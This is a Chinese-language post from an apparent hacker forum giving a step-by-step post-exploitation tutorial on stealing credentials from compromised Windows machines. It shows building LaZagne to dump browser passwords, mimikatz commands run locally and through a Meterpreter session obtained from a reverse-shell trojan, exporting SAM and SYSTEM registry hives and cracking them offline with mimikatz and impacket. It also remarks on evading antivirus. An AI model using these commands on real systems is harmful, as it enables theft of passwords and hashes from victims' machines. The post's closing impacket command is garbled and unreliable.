• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

后渗透篇之密码抓取


H4CK

Recommended Posts

使用laZagne来抓取密码

什么是laZagne呢,它是一个Pythono编写的一个很强大的密码抓取工具,有名的工具比如mimikatz,但是只能限于windwos情况下进行抓取,并且对于免杀方面的工作还要我们自己来做(但是msf等后渗透工具已经集成了,相对说利用较为方便)。

相对于laZagne来说就要差一点,因为它不仅支持跨平台,又因为使用python进行编译的,免杀的效果就相对于mimikatz来说就强一点。

项目地址

下载并且进行编译:

支持语言:Python2.x

先安装Python的模块
pip install pyinstaller

下载项目

git clone https://github.com/AlessandroZ/LaZagne.git

之后进入对应的文件夹(MAC/Linux/win)

进行编译

pyinstaller --onefile -w lazagne.py

然后就运行
laZagne.exe all就会枚举出浏览器存储的密码(我的浏览近百条明文密码都被抓取到了),至于想要抓取系统的密码hash就需要管理员的权限(mimikatz也是一样的),这个就不提这个了。

关于laZagne的更多的高级用法就去项目里面查看,这里不再累述。

mimikatz抓取密码

老牌的密码抓取神器了,msf里面是直接集成了,获取了meterpreter的情况下直接运行.

先看看一般用法,在CMD中执行
mimikatz
然后在执行privilege::debug用于提升权限

导出密码hash
sekurlsa::logonpasswords

后记:一切的情况都是在管理员情况下执行的!!(并且其实一执行360就会报毒的,还有就是关于这种在线的导出hash,其实很容易的被抓到的),其实mimikatz还有很多的功能,比如制造票据等等啦,涉及到域渗透的东西了,我还没有理解。以后进行补充。

下面就来介绍一下如何离线导出hash

在windows下破解hash值

需要工具:mimikatz
项目地址
这里面假设我们已经获取到了一个meterpreter的shell,接下来我们先试试msf自带的mimikatz怎么样,再试试离线破解hash

在meterpreter中使用mimikatz也是必须要管理员的权限,这里面我是以管理员形式运行的木马反弹的meterpreter。

首先先加载mimikatz

meterpreter > load mimikatz 
Loading extension mimikatz...[!] Loaded x86 Mimikatz on an x64 architecture.

[!] Loaded Mimikatz on a newer OS (Windows 10 (10.0 Build 17763).). Did you mean to 'load kiwi' instead?
Success.
meterpreter >

接着抓取密码

meterpreter > msv  获取的是hash

meterpreter > ssp  获取的是明文信息

meterpreter > wdigest  读取内存中存放的账号密码明文信息

meterpreter > kerberos

运行自定义的命令

meterpreter > mimikatz_command -f a::  输入一个错误的模块,可以列出所有模块

meterpreter > mimikatz_command -f samdump::  可以列出samdump的子命令

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f handle::list  列出应用进程

meterpreter > mimikatz_command -f service::list  列出服务

Ok好了接下来我们就来试试离线的抓取hash

离线抓取hash是很必要的,因为很多时候、很多环境下是不允许执行、上传mimikatz的

要想离线抓取hash首先我们需要备份注册表
进入shell中执行以下命令

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

这个时候当前目录就会出现三个.hiv的文件

利用meterpreter将他们下载下来
download xxx.hiv 保存路径

注意:导出注册表也是需要管理员的权限的,不然导出的是空的

接下来将他们放到mimikatz同一目录下执行

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

1684739-20191017185327975-1326624606.jpg

成功!!!

当然不仅可以在Windows上破解在Linux上也是可以的,这里面借助的是kali中的impacket,默认的路径位于/root/impacket/examples/secretsdump.py

命令如下:
root@John:/tmp#python /root/impacket/examples/secretsdump.pysamsa m.hiv security security.hiv system sys.hiv LOCAL

Link to comment
Share on other sites

  • 7 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now